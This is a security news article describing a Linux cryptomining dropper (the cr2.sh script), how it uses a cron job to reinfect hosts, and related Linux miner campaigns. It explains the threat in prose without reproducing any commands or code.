A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.
The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.
As Sucuri’s security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.
The malicious Bash script named cr2.sh would immediately start hunting down and killing any processes related to cryptomining such as xmrig and cryptonight, subsequently downloading the cryptominer payload by sending a request to an attacker-controlled server.
“After it has determined whether the OS environment is 32 or 64 bit, this value is used to download the cryptominer payload” using a curl or wget command as /tmp/php, while the miner’s configuration file will be downloaded from the same server.
“The script has now downloaded to the web server all of the necessary content to go ahead and spawn the process using nohup, which allows the process to continue running regardless if the user ends their bash session,” says Leal.
During the next infection phase, the malicious miner process loaded in the Linux host’s memory will delete the payload and the configuration file to hide its presence.
The malware will then gain persistence on the infected server by creating a cron job that runs every minute, checking for the cr2.sh Bash script used in the initial infection stage, and automatically re-downloading and executing if missing.
By adding this cron job, the malware will be able to automatically reinfect the host even if the admin kills its process and will remove all dropped malicious files from the hard drive
This makes it obvious that hunting down the malware through all of a computer drives’ nooks and crannies will never be enough. The only way to make sure that an infection is completely eliminated is to also detect potential persistence methods it uses to get back on the system without the hacker’s intervention.
The Sucuri researchers also notes that “it’s not just web servers that are targeted — it can also infect desktop installations of 32/64bit Linux systems and other variants, which are used to infect Windows installations.”
While using cryptomining campaigns are usually nipped in the bud by scripts designed to detect and kill processes which abuse a server’s CPU resources, in this case, the hackers circumvent this slight annoyance by choosing to “offload the mining to the client side of the browser.”
Linux targeted with coin miners
The Linux platform is getting more and more attention from cybercriminals as Check Point proved with the discovery of a Backdoor Trojan they dubbed SpeakUp that targets servers running six different Linux distributions to drop XMRig miners.
Another campaign detected by Trend Micro during February deployed the XMR-Stak Cryptonight cryptocurrency miner on Linux machines, at the same time hunting down and killing other Linux malware and coin miners present on computers it compromised.
Also, the Xbash botnet spotted by Palo Alto Networks’ Unit 42 in September 2018 comes with self-spreading capabilities and it targets both Linux and Windows servers, combining cryptomining and ransomware capabilities.